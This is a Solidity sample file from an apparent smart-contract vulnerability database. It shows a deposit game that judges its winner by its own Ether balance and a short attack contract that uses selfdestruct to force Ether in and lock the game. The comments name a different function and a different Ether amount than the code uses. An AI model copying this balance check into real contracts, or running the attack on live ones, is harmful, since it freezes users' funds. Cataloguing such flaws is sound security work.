Smart-Contract-Vulnerabilities-DB / Base Sample / selfdestruct / selfdestruct_1.sol
selfdestruct_1.sol
Raw 
// SPDX-License-Identifier: MIT
//https://solidity-by-example.org/hacks/self-destruct/
pragma solidity 0.8.19;

// The goal of this game is to be the 7th player to deposit 1 Ether.
// Players can deposit only 1 Ether at a time.
// Winner will be able to withdraw all Ether.

/*
1. Deploy EtherGame
2. Players (say Alice and Bob) decides to play, deposits 1 Ether each.
2. Deploy Attack with address of EtherGame
3. Call Attack.attack sending 5 ether. This will break the game
   No one can become the winner.

What happened?
Attack forced the balance of EtherGame to equal 7 ether.
Now no one can deposit and the winner cannot be set.
*/

contract EtherGame {
    uint public targetAmount = 7 ether;
    address public winner;

    function deposit() public payable {
        require(msg.value == 1 ether, "You can only send 1 Ether");

        uint balance = address(this).balance;
        require(balance <= targetAmount, "Game is over");

        if (balance == targetAmount) {
            winner = msg.sender;
        }
    }

    function claimReward() public {
        require(msg.sender == winner, "Not winner");

        (bool sent, ) = msg.sender.call{value: address(this).balance}("");
        require(sent, "Failed to send Ether");
        winner = address(0x0);
    }
}

contract disruptGame{
    function kkkkkkk(address addr) public payable {
        require(msg.value > 7 ether, "More funds needed");
        selfdestruct(payable(addr));
    }
}
Powered by GitFront